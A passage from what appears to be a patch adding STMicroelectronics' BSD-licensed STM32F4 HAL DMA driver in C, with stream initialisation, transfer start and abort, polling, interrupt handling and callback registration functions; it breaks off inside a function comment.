(+) Use HAL_DMA_Start_IT() to start DMA transfer after the configuration of + Source address and destination address and the Length of data to be transferred. In this + case the DMA interrupt is configured + (+) Use HAL_DMA_IRQHandler() called under DMA_IRQHandler() Interrupt subroutine + (+) At the end of data transfer HAL_DMA_IRQHandler() function is executed and user can + add his own function by customization of function pointer XferCpltCallback and + XferErrorCallback (i.e a member of DMA handle structure). + [..] + (#) Use HAL_DMA_GetState() function to return the DMA state and HAL_DMA_GetError() in case of error + detection. + + (#) Use HAL_DMA_Abort_IT() function to abort the current transfer + + -@- In Memory-to-Memory transfer mode, Circular mode is not allowed. + + -@- The FIFO is used mainly to reduce bus usage and to allow data packing/unpacking: it is + possible to set different Data Sizes for the Peripheral and the Memory (ie. you can set + Half-Word data size for the peripheral to access its data register and set Word data size + for the Memory to gain in access time. Each two half words will be packed and written in + a single access to a Word in the Memory). + + -@- When FIFO is disabled, it is not allowed to configure different Data Sizes for Source + and Destination. In this case the Peripheral Data Size will be applied to both Source + and Destination. + + *** DMA HAL driver macros list *** + ============================================= + [..] + Below the list of most used macros in DMA HAL driver. + + (+) __HAL_DMA_ENABLE: Enable the specified DMA Stream. + (+) __HAL_DMA_DISABLE: Disable the specified DMA Stream. + (+) __HAL_DMA_GET_IT_SOURCE: Check whether the specified DMA Stream interrupt has occurred or not. + + [..] + (@) You can refer to the DMA HAL driver header file for more useful macros + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup DMA DMA + * @brief DMA HAL module driver + * @{ + */ + +#ifdef HAL_DMA_MODULE_ENABLED + +/* Private types -------------------------------------------------------------*/ +typedef struct +{ + __IO uint32_t ISR; /*!< DMA interrupt status register */ + __IO uint32_t Reserved0; + __IO uint32_t IFCR; /*!< DMA interrupt flag clear register */ +} DMA_Base_Registers; + +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/** @addtogroup DMA_Private_Constants + * @{ + */ + #define HAL_TIMEOUT_DMA_ABORT 5U /* 5 ms */ +/** + * @} + */ +/* Private macros ------------------------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ +/** @addtogroup DMA_Private_Functions + * @{ + */ +static void DMA_SetConfig(DMA_HandleTypeDef *hdma, uint32_t SrcAddress, uint32_t DstAddress, uint32_t DataLength); +static uint32_t DMA_CalcBaseAndBitshift(DMA_HandleTypeDef *hdma); +static HAL_StatusTypeDef DMA_CheckFifoParam(DMA_HandleTypeDef *hdma); + +/** + * @} + */ + +/* Exported functions ---------------------------------------------------------*/ +/** @addtogroup DMA_Exported_Functions + * @{ + */ + +/** @addtogroup DMA_Exported_Functions_Group1 + * +@verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] + This section provides functions allowing to initialize the DMA Stream source + and destination addresses, incrementation and data sizes, transfer direction, + circular/normal mode selection, memory-to-memory mode selection and Stream priority value. + [..] + The HAL_DMA_Init() function follows the DMA configuration procedures as described in + reference manual. + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the DMA according to the specified + * parameters in the DMA_InitTypeDef and create the associated handle. + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA_Init(DMA_HandleTypeDef *hdma) +{ + uint32_t tmp = 0U; + uint32_t tickstart = HAL_GetTick(); + DMA_Base_Registers *regs; + + /* Check the DMA peripheral state */ + if(hdma == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_DMA_STREAM_ALL_INSTANCE(hdma->Instance)); + assert_param(IS_DMA_CHANNEL(hdma->Init.Channel)); + assert_param(IS_DMA_DIRECTION(hdma->Init.Direction)); + assert_param(IS_DMA_PERIPHERAL_INC_STATE(hdma->Init.PeriphInc)); + assert_param(IS_DMA_MEMORY_INC_STATE(hdma->Init.MemInc)); + assert_param(IS_DMA_PERIPHERAL_DATA_SIZE(hdma->Init.PeriphDataAlignment)); + assert_param(IS_DMA_MEMORY_DATA_SIZE(hdma->Init.MemDataAlignment)); + assert_param(IS_DMA_MODE(hdma->Init.Mode)); + assert_param(IS_DMA_PRIORITY(hdma->Init.Priority)); + assert_param(IS_DMA_FIFO_MODE_STATE(hdma->Init.FIFOMode)); + /* Check the memory burst, peripheral burst and FIFO threshold parameters only + when FIFO mode is enabled */ + if(hdma->Init.FIFOMode != DMA_FIFOMODE_DISABLE) + { + assert_param(IS_DMA_FIFO_THRESHOLD(hdma->Init.FIFOThreshold)); + assert_param(IS_DMA_MEMORY_BURST(hdma->Init.MemBurst)); + assert_param(IS_DMA_PERIPHERAL_BURST(hdma->Init.PeriphBurst)); + } + + /* Change DMA peripheral state */ + hdma->State = HAL_DMA_STATE_BUSY; + + /* Allocate lock resource */ + __HAL_UNLOCK(hdma); + + /* Disable the peripheral */ + __HAL_DMA_DISABLE(hdma); + + /* Check if the DMA Stream is effectively disabled */ + while((hdma->Instance->CR & DMA_SxCR_EN) != RESET) + { + /* Check for the Timeout */ + if((HAL_GetTick() - tickstart ) > HAL_TIMEOUT_DMA_ABORT) + { + /* Update error code */ + hdma->ErrorCode = HAL_DMA_ERROR_TIMEOUT; + + /* Change the DMA state */ + hdma->State = HAL_DMA_STATE_TIMEOUT; + + return HAL_TIMEOUT; + } + } + + /* Get the CR register value */ + tmp = hdma->Instance->CR; + + /* Clear CHSEL, MBURST, PBURST, PL, MSIZE, PSIZE, MINC, PINC, CIRC, DIR, CT and DBM bits */ + tmp &= ((uint32_t)~(DMA_SxCR_CHSEL | DMA_SxCR_MBURST | DMA_SxCR_PBURST | \ + DMA_SxCR_PL | DMA_SxCR_MSIZE | DMA_SxCR_PSIZE | \ + DMA_SxCR_MINC | DMA_SxCR_PINC | DMA_SxCR_CIRC | \ + DMA_SxCR_DIR | DMA_SxCR_CT | DMA_SxCR_DBM)); + + /* Prepare the DMA Stream configuration */ + tmp |= hdma->Init.Channel | hdma->Init.Direction | + hdma->Init.PeriphInc | hdma->Init.MemInc | + hdma->Init.PeriphDataAlignment | hdma->Init.MemDataAlignment | + hdma->Init.Mode | hdma->Init.Priority; + + /* the Memory burst and peripheral burst are not used when the FIFO is disabled */ + if(hdma->Init.FIFOMode == DMA_FIFOMODE_ENABLE) + { + /* Get memory burst and peripheral burst */ + tmp |= hdma->Init.MemBurst | hdma->Init.PeriphBurst; + } + + /* Write to DMA Stream CR register */ + hdma->Instance->CR = tmp; + + /* Get the FCR register value */ + tmp = hdma->Instance->FCR; + + /* Clear Direct mode and FIFO threshold bits */ + tmp &= (uint32_t)~(DMA_SxFCR_DMDIS | DMA_SxFCR_FTH); + + /* Prepare the DMA Stream FIFO configuration */ + tmp |= hdma->Init.FIFOMode; + + /* The FIFO threshold is not used when the FIFO mode is disabled */ + if(hdma->Init.FIFOMode == DMA_FIFOMODE_ENABLE) + { + /* Get the FIFO threshold */ + tmp |= hdma->Init.FIFOThreshold; + + /* Check compatibility between FIFO threshold level and size of the memory burst */ + /* for INCR4, INCR8, INCR16 bursts */ + if (hdma->Init.MemBurst != DMA_MBURST_SINGLE) + { + if (DMA_CheckFifoParam(hdma) != HAL_OK) + { + /* Update error code */ + hdma->ErrorCode = HAL_DMA_ERROR_PARAM; + + /* Change the DMA state */ + hdma->State = HAL_DMA_STATE_READY; + + return HAL_ERROR; + } + } + } + + /* Write to DMA Stream FCR */ + hdma->Instance->FCR = tmp; + + /* Initialize StreamBaseAddress and StreamIndex parameters to be used to calculate + DMA steam Base Address needed by HAL_DMA_IRQHandler() and HAL_DMA_PollForTransfer() */ + regs = (DMA_Base_Registers *)DMA_CalcBaseAndBitshift(hdma); + + /* Clear all interrupt flags */ + regs->IFCR = 0x3FU << hdma->StreamIndex; + + /* Initialize the error code */ + hdma->ErrorCode = HAL_DMA_ERROR_NONE; + + /* Initialize the DMA state */ + hdma->State = HAL_DMA_STATE_READY; + + return HAL_OK; +} + +/** + * @brief DeInitializes the DMA peripheral + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA_DeInit(DMA_HandleTypeDef *hdma) +{ + DMA_Base_Registers *regs; + + /* Check the DMA peripheral state */ + if(hdma == NULL) + { + return HAL_ERROR; + } + + /* Check the DMA peripheral state */ + if(hdma->State == HAL_DMA_STATE_BUSY) + { + /* Return error status */ + return HAL_BUSY; + } + + /* Check the parameters */ + assert_param(IS_DMA_STREAM_ALL_INSTANCE(hdma->Instance)); + + /* Disable the selected DMA Streamx */ + __HAL_DMA_DISABLE(hdma); + + /* Reset DMA Streamx control register */ + hdma->Instance->CR = 0U; + + /* Reset DMA Streamx number of data to transfer register */ + hdma->Instance->NDTR = 0U; + + /* Reset DMA Streamx peripheral address register */ + hdma->Instance->PAR = 0U; + + /* Reset DMA Streamx memory 0 address register */ + hdma->Instance->M0AR = 0U; + + /* Reset DMA Streamx memory 1 address register */ + hdma->Instance->M1AR = 0U; + + /* Reset DMA Streamx FIFO control register */ + hdma->Instance->FCR = 0x00000021U; + + /* Get DMA steam Base Address */ + regs = (DMA_Base_Registers *)DMA_CalcBaseAndBitshift(hdma); + + /* Clean all callbacks */ + hdma->XferCpltCallback = NULL; + hdma->XferHalfCpltCallback = NULL; + hdma->XferM1CpltCallback = NULL; + hdma->XferM1HalfCpltCallback = NULL; + hdma->XferErrorCallback = NULL; + hdma->XferAbortCallback = NULL; + + /* Clear all interrupt flags at correct offset within the register */ + regs->IFCR = 0x3FU << hdma->StreamIndex; + + /* Reset the error code */ + hdma->ErrorCode = HAL_DMA_ERROR_NONE; + + /* Reset the DMA state */ + hdma->State = HAL_DMA_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hdma); + + return HAL_OK; +} + +/** + * @} + */ + +/** @addtogroup DMA_Exported_Functions_Group2 + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Configure the source, destination address and data length and Start DMA transfer + (+) Configure the source, destination address and data length and + Start DMA transfer with interrupt + (+) Abort DMA transfer + (+) Poll for transfer complete + (+) Handle DMA interrupt request + +@endverbatim + * @{ + */ + +/** + * @brief Starts the DMA Transfer. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * @param SrcAddress The source memory Buffer address + * @param DstAddress The destination memory Buffer address + * @param DataLength The length of data to be transferred from source to destination + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA_Start(DMA_HandleTypeDef *hdma, uint32_t SrcAddress, uint32_t DstAddress, uint32_t DataLength) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check the parameters */ + assert_param(IS_DMA_BUFFER_SIZE(DataLength)); + + /* Process locked */ + __HAL_LOCK(hdma); + + if(HAL_DMA_STATE_READY == hdma->State) + { + /* Change DMA peripheral state */ + hdma->State = HAL_DMA_STATE_BUSY; + + /* Initialize the error code */ + hdma->ErrorCode = HAL_DMA_ERROR_NONE; + + /* Configure the source, destination address and the data length */ + DMA_SetConfig(hdma, SrcAddress, DstAddress, DataLength); + + /* Enable the Peripheral */ + __HAL_DMA_ENABLE(hdma); + } + else + { + /* Process unlocked */ + __HAL_UNLOCK(hdma); + + /* Return error status */ + status = HAL_BUSY; + } + return status; +} + +/** + * @brief Start the DMA Transfer with interrupt enabled. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * @param SrcAddress The source memory Buffer address + * @param DstAddress The destination memory Buffer address + * @param DataLength The length of data to be transferred from source to destination + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA_Start_IT(DMA_HandleTypeDef *hdma, uint32_t SrcAddress, uint32_t DstAddress, uint32_t DataLength) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* calculate DMA base and stream number */ + DMA_Base_Registers *regs = (DMA_Base_Registers *)hdma->StreamBaseAddress; + + /* Check the parameters */ + assert_param(IS_DMA_BUFFER_SIZE(DataLength)); + + /* Process locked */ + __HAL_LOCK(hdma); + + if(HAL_DMA_STATE_READY == hdma->State) + { + /* Change DMA peripheral state */ + hdma->State = HAL_DMA_STATE_BUSY; + + /* Initialize the error code */ + hdma->ErrorCode = HAL_DMA_ERROR_NONE; + + /* Configure the source, destination address and the data length */ + DMA_SetConfig(hdma, SrcAddress, DstAddress, DataLength); + + /* Clear all interrupt flags at correct offset within the register */ + regs->IFCR = 0x3FU << hdma->StreamIndex; + + /* Enable Common interrupts*/ + hdma->Instance->CR |= DMA_IT_TC | DMA_IT_TE | DMA_IT_DME; + + if(hdma->XferHalfCpltCallback != NULL) + { + hdma->Instance->CR |= DMA_IT_HT; + } + + /* Enable the Peripheral */ + __HAL_DMA_ENABLE(hdma); + } + else + { + /* Process unlocked */ + __HAL_UNLOCK(hdma); + + /* Return error status */ + status = HAL_BUSY; + } + + return status; +} + +/** + * @brief Aborts the DMA Transfer. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * + * @note After disabling a DMA Stream, a check for wait until the DMA Stream is + * effectively disabled is added. If a Stream is disabled + * while a data transfer is ongoing, the current data will be transferred + * and the Stream will be effectively disabled only after the transfer of + * this single data is finished. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA_Abort(DMA_HandleTypeDef *hdma) +{ + /* calculate DMA base and stream number */ + DMA_Base_Registers *regs = (DMA_Base_Registers *)hdma->StreamBaseAddress; + + uint32_t tickstart = HAL_GetTick(); + + if(hdma->State != HAL_DMA_STATE_BUSY) + { + hdma->ErrorCode = HAL_DMA_ERROR_NO_XFER; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma); + + return HAL_ERROR; + } + else + { + /* Disable all the transfer interrupts */ + hdma->Instance->CR &= ~(DMA_IT_TC | DMA_IT_TE | DMA_IT_DME); + hdma->Instance->FCR &= ~(DMA_IT_FE); + + if((hdma->XferHalfCpltCallback != NULL) || (hdma->XferM1HalfCpltCallback != NULL)) + { + hdma->Instance->CR &= ~(DMA_IT_HT); + } + + /* Disable the stream */ + __HAL_DMA_DISABLE(hdma); + + /* Check if the DMA Stream is effectively disabled */ + while((hdma->Instance->CR & DMA_SxCR_EN) != RESET) + { + /* Check for the Timeout */ + if((HAL_GetTick() - tickstart ) > HAL_TIMEOUT_DMA_ABORT) + { + /* Update error code */ + hdma->ErrorCode = HAL_DMA_ERROR_TIMEOUT; + + /* Change the DMA state */ + hdma->State = HAL_DMA_STATE_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma); + + return HAL_TIMEOUT; + } + } + + /* Clear all interrupt flags at correct offset within the register */ + regs->IFCR = 0x3FU << hdma->StreamIndex; + + /* Change the DMA state*/ + hdma->State = HAL_DMA_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma); + } + return HAL_OK; +} + +/** + * @brief Aborts the DMA Transfer in Interrupt mode. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA_Abort_IT(DMA_HandleTypeDef *hdma) +{ + if(hdma->State != HAL_DMA_STATE_BUSY) + { + hdma->ErrorCode = HAL_DMA_ERROR_NO_XFER; + return HAL_ERROR; + } + else + { + /* Set Abort State */ + hdma->State = HAL_DMA_STATE_ABORT; + + /* Disable the stream */ + __HAL_DMA_DISABLE(hdma); + } + + return HAL_OK; +} + +/** + * @brief Polling for transfer complete. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * @param CompleteLevel Specifies the DMA level complete. + * @note The polling mode is kept in this version for legacy. it is recommanded to use the IT model instead. + * This model could be used for debug purpose. + * @note The HAL_DMA_PollForTransfer API cannot be used in circular and double buffering mode (automatic circular mode). + * @param Timeout Timeout duration. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA_PollForTransfer(DMA_HandleTypeDef *hdma, HAL_DMA_LevelCompleteTypeDef CompleteLevel, uint32_t Timeout) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t mask_cpltlevel; + uint32_t tickstart = HAL_GetTick(); + uint32_t tmpisr; + + /* calculate DMA base and stream number */ + DMA_Base_Registers *regs; + + if(HAL_DMA_STATE_BUSY != hdma->State) + { + /* No transfer ongoing */ + hdma->ErrorCode = HAL_DMA_ERROR_NO_XFER; + __HAL_UNLOCK(hdma); + return HAL_ERROR; + } + + /* Polling mode not supported in circular mode and double buffering mode */ + if ((hdma->Instance->CR & DMA_SxCR_CIRC) != RESET) + { + hdma->ErrorCode = HAL_DMA_ERROR_NOT_SUPPORTED; + return HAL_ERROR; + } + + /* Get the level transfer complete flag */ + if(CompleteLevel == HAL_DMA_FULL_TRANSFER) + { + /* Transfer Complete flag */ + mask_cpltlevel = DMA_FLAG_TCIF0_4 << hdma->StreamIndex; + } + else + { + /* Half Transfer Complete flag */ + mask_cpltlevel = DMA_FLAG_HTIF0_4 << hdma->StreamIndex; + } + + regs = (DMA_Base_Registers *)hdma->StreamBaseAddress; + tmpisr = regs->ISR; + + while(((tmpisr & mask_cpltlevel) == RESET) && ((hdma->ErrorCode & HAL_DMA_ERROR_TE) == RESET)) + { + /* Check for the Timeout (Not applicable in circular mode)*/ + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U)||((HAL_GetTick() - tickstart ) > Timeout)) + { + /* Update error code */ + hdma->ErrorCode = HAL_DMA_ERROR_TIMEOUT; + + /* Change the DMA state */ + hdma->State = HAL_DMA_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma); + + return HAL_TIMEOUT; + } + } + + /* Get the ISR register value */ + tmpisr = regs->ISR; + + if((tmpisr & (DMA_FLAG_TEIF0_4 << hdma->StreamIndex)) != RESET) + { + /* Update error code */ + hdma->ErrorCode |= HAL_DMA_ERROR_TE; + + /* Clear the transfer error flag */ + regs->IFCR = DMA_FLAG_TEIF0_4 << hdma->StreamIndex; + } + + if((tmpisr & (DMA_FLAG_FEIF0_4 << hdma->StreamIndex)) != RESET) + { + /* Update error code */ + hdma->ErrorCode |= HAL_DMA_ERROR_FE; + + /* Clear the FIFO error flag */ + regs->IFCR = DMA_FLAG_FEIF0_4 << hdma->StreamIndex; + } + + if((tmpisr & (DMA_FLAG_DMEIF0_4 << hdma->StreamIndex)) != RESET) + { + /* Update error code */ + hdma->ErrorCode |= HAL_DMA_ERROR_DME; + + /* Clear the Direct Mode error flag */ + regs->IFCR = DMA_FLAG_DMEIF0_4 << hdma->StreamIndex; + } + } + + if(hdma->ErrorCode != HAL_DMA_ERROR_NONE) + { + if((hdma->ErrorCode & HAL_DMA_ERROR_TE) != RESET) + { + HAL_DMA_Abort(hdma); + + /* Clear the half transfer and transfer complete flags */ + regs->IFCR = (DMA_FLAG_HTIF0_4 | DMA_FLAG_TCIF0_4) << hdma->StreamIndex; + + /* Change the DMA state */ + hdma->State= HAL_DMA_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma); + + return HAL_ERROR; + } + } + + /* Get the level transfer complete flag */ + if(CompleteLevel == HAL_DMA_FULL_TRANSFER) + { + /* Clear the half transfer and transfer complete flags */ + regs->IFCR = (DMA_FLAG_HTIF0_4 | DMA_FLAG_TCIF0_4) << hdma->StreamIndex; + + hdma->State = HAL_DMA_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma); + } + else + { + /* Clear the half transfer and transfer complete flags */ + regs->IFCR = (DMA_FLAG_HTIF0_4) << hdma->StreamIndex; + } + + return status; +} + +/** + * @brief Handles DMA interrupt request. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * @retval None + */ +void HAL_DMA_IRQHandler(DMA_HandleTypeDef *hdma) +{ + uint32_t tmpisr; + __IO uint32_t count = 0U; + uint32_t timeout = SystemCoreClock / 9600U; + + /* calculate DMA base and stream number */ + DMA_Base_Registers *regs = (DMA_Base_Registers *)hdma->StreamBaseAddress; + + tmpisr = regs->ISR; + + /* Transfer Error Interrupt management ***************************************/ + if ((tmpisr & (DMA_FLAG_TEIF0_4 << hdma->StreamIndex)) != RESET) + { + if(__HAL_DMA_GET_IT_SOURCE(hdma, DMA_IT_TE) != RESET) + { + /* Disable the transfer error interrupt */ + hdma->Instance->CR &= ~(DMA_IT_TE); + + /* Clear the transfer error flag */ + regs->IFCR = DMA_FLAG_TEIF0_4 << hdma->StreamIndex; + + /* Update error code */ + hdma->ErrorCode |= HAL_DMA_ERROR_TE; + } + } + /* FIFO Error Interrupt management ******************************************/ + if ((tmpisr & (DMA_FLAG_FEIF0_4 << hdma->StreamIndex)) != RESET) + { + if(__HAL_DMA_GET_IT_SOURCE(hdma, DMA_IT_FE) != RESET) + { + /* Clear the FIFO error flag */ + regs->IFCR = DMA_FLAG_FEIF0_4 << hdma->StreamIndex; + + /* Update error code */ + hdma->ErrorCode |= HAL_DMA_ERROR_FE; + } + } + /* Direct Mode Error Interrupt management ***********************************/ + if ((tmpisr & (DMA_FLAG_DMEIF0_4 << hdma->StreamIndex)) != RESET) + { + if(__HAL_DMA_GET_IT_SOURCE(hdma, DMA_IT_DME) != RESET) + { + /* Clear the direct mode error flag */ + regs->IFCR = DMA_FLAG_DMEIF0_4 << hdma->StreamIndex; + + /* Update error code */ + hdma->ErrorCode |= HAL_DMA_ERROR_DME; + } + } + /* Half Transfer Complete Interrupt management ******************************/ + if ((tmpisr & (DMA_FLAG_HTIF0_4 << hdma->StreamIndex)) != RESET) + { + if(__HAL_DMA_GET_IT_SOURCE(hdma, DMA_IT_HT) != RESET) + { + /* Clear the half transfer complete flag */ + regs->IFCR = DMA_FLAG_HTIF0_4 << hdma->StreamIndex; + + /* Multi_Buffering mode enabled */ + if(((hdma->Instance->CR) & (uint32_t)(DMA_SxCR_DBM)) != RESET) + { + /* Current memory buffer used is Memory 0 */ + if((hdma->Instance->CR & DMA_SxCR_CT) == RESET) + { + if(hdma->XferHalfCpltCallback != NULL) + { + /* Half transfer callback */ + hdma->XferHalfCpltCallback(hdma); + } + } + /* Current memory buffer used is Memory 1 */ + else + { + if(hdma->XferM1HalfCpltCallback != NULL) + { + /* Half transfer callback */ + hdma->XferM1HalfCpltCallback(hdma); + } + } + } + else + { + /* Disable the half transfer interrupt if the DMA mode is not CIRCULAR */ + if((hdma->Instance->CR & DMA_SxCR_CIRC) == RESET) + { + /* Disable the half transfer interrupt */ + hdma->Instance->CR &= ~(DMA_IT_HT); + } + + if(hdma->XferHalfCpltCallback != NULL) + { + /* Half transfer callback */ + hdma->XferHalfCpltCallback(hdma); + } + } + } + } + /* Transfer Complete Interrupt management ***********************************/ + if ((tmpisr & (DMA_FLAG_TCIF0_4 << hdma->StreamIndex)) != RESET) + { + if(__HAL_DMA_GET_IT_SOURCE(hdma, DMA_IT_TC) != RESET) + { + /* Clear the transfer complete flag */ + regs->IFCR = DMA_FLAG_TCIF0_4 << hdma->StreamIndex; + + if(HAL_DMA_STATE_ABORT == hdma->State) + { + /* Disable all the transfer interrupts */ + hdma->Instance->CR &= ~(DMA_IT_TC | DMA_IT_TE | DMA_IT_DME); + hdma->Instance->FCR &= ~(DMA_IT_FE); + + if((hdma->XferHalfCpltCallback != NULL) || (hdma->XferM1HalfCpltCallback != NULL)) + { + hdma->Instance->CR &= ~(DMA_IT_HT); + } + + /* Clear all interrupt flags at correct offset within the register */ + regs->IFCR = 0x3FU << hdma->StreamIndex; + + /* Change the DMA state */ + hdma->State = HAL_DMA_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma); + + if(hdma->XferAbortCallback != NULL) + { + hdma->XferAbortCallback(hdma); + } + return; + } + + if(((hdma->Instance->CR) & (uint32_t)(DMA_SxCR_DBM)) != RESET) + { + /* Current memory buffer used is Memory 0 */ + if((hdma->Instance->CR & DMA_SxCR_CT) == RESET) + { + if(hdma->XferM1CpltCallback != NULL) + { + /* Transfer complete Callback for memory1 */ + hdma->XferM1CpltCallback(hdma); + } + } + /* Current memory buffer used is Memory 1 */ + else + { + if(hdma->XferCpltCallback != NULL) + { + /* Transfer complete Callback for memory0 */ + hdma->XferCpltCallback(hdma); + } + } + } + /* Disable the transfer complete interrupt if the DMA mode is not CIRCULAR */ + else + { + if((hdma->Instance->CR & DMA_SxCR_CIRC) == RESET) + { + /* Disable the transfer complete interrupt */ + hdma->Instance->CR &= ~(DMA_IT_TC); + + /* Change the DMA state */ + hdma->State = HAL_DMA_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma); + } + + if(hdma->XferCpltCallback != NULL) + { + /* Transfer complete callback */ + hdma->XferCpltCallback(hdma); + } + } + } + } + + /* manage error case */ + if(hdma->ErrorCode != HAL_DMA_ERROR_NONE) + { + if((hdma->ErrorCode & HAL_DMA_ERROR_TE) != RESET) + { + hdma->State = HAL_DMA_STATE_ABORT; + + /* Disable the stream */ + __HAL_DMA_DISABLE(hdma); + + do + { + if (++count > timeout) + { + break; + } + } + while((hdma->Instance->CR & DMA_SxCR_EN) != RESET); + + /* Change the DMA state */ + hdma->State = HAL_DMA_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma); + } + + if(hdma->XferErrorCallback != NULL) + { + /* Transfer error callback */ + hdma->XferErrorCallback(hdma); + } + } +} + +/** + * @brief Register callbacks + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * @param CallbackID User Callback identifer + * a DMA_HandleTypeDef structure as parameter. + * @param pCallback pointer to private callbacsk function which has pointer to + * a DMA_HandleTypeDef structure as parameter. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA_RegisterCallback(DMA_HandleTypeDef *hdma, HAL_DMA_CallbackIDTypeDef CallbackID, void (* pCallback)(DMA_HandleTypeDef *_hdma)) +{ + + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hdma); + + if(HAL_DMA_STATE_READY == hdma->State) + { + switch (CallbackID) + { + case HAL_DMA_XFER_CPLT_CB_ID: + hdma->XferCpltCallback = pCallback; + break; + + case HAL_DMA_XFER_HALFCPLT_CB_ID: + hdma->XferHalfCpltCallback = pCallback; + break; + + case HAL_DMA_XFER_M1CPLT_CB_ID: + hdma->XferM1CpltCallback = pCallback; + break; + + case HAL_DMA_XFER_M1HALFCPLT_CB_ID: + hdma->XferM1HalfCpltCallback = pCallback; + break; + + case HAL_DMA_XFER_ERROR_CB_ID: + hdma->XferErrorCallback = pCallback; + break; + + case HAL_DMA_XFER_ABORT_CB_ID: + hdma->XferAbortCallback = pCallback; + break; + + default: + break; + } + } + else + { + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hdma); + + return status; +} + +/** + * @brief UnRegister callbacks + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * @param CallbackID User Callback identifer + * a HAL_DMA_CallbackIDTypeDef ENUM as parameter. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA_UnRegisterCallback(DMA_HandleTypeDef *hdma, HAL_DMA_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hdma); + + if(HAL_DMA_STATE_READY == hdma->State) + { + switch (CallbackID) + { + case HAL_DMA_XFER_CPLT_CB_ID: + hdma->XferCpltCallback = NULL; + break; + + case HAL_DMA_XFER_HALFCPLT_CB_ID: + hdma->XferHalfCpltCallback = NULL; + break; + + case HAL_DMA_XFER_M1CPLT_CB_ID: + hdma->XferM1CpltCallback = NULL; + break; + + case HAL_DMA_XFER_M1HALFCPLT_CB_ID: + hdma->XferM1HalfCpltCallback = NULL; + break; + + case HAL_DMA_XFER_ERROR_CB_ID: + hdma->XferErrorCallback = NULL; + break; + + case HAL_DMA_XFER_ABORT_CB_ID: + hdma->XferAbortCallback = NULL; + break; + + case HAL_DMA_XFER_ALL_CB_ID: + hdma->XferCpltCallback = NULL; + hdma->XferHalfCpltCallback = NULL; + hdma->XferM1CpltCallback = NULL; + hdma->XferM1HalfCpltCallback = NULL; + hdma->XferErrorCallback = NULL; + hdma->XferAbortCallback = NULL; + break; + + default: + status = HAL_ERROR; + break; + } + } + else + { + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hdma); + + return status; +} + +/** + * @} + */ + +/** @addtogroup DMA_Exported_Functions_Group3 + * +@verbatim + =============================================================================== + ##### State and Errors functions ##### + =============================================================================== + [..] + This subsection provides functions allowing to + (+) Check the DMA state + (+) Get error code + +@endverbatim + * @{ + */ + +/** + * @brief Returns the DMA state. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * @retval HAL state + */ +HAL_DMA_StateTypeDef HAL_DMA_GetState(DMA_HandleTypeDef *hdma) +{ + return hdma->State; +} + +/** + * @brief Return the DMA error code + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * @retval DMA Error Code + */ +uint32_t HAL_DMA_GetError(DMA_HandleTypeDef *hdma) +{ + return hdma->ErrorCode; +} + +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup DMA_Private_Functions + * @{ + */ + +/** + * @brief Sets the DMA Transfer parameter. + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * 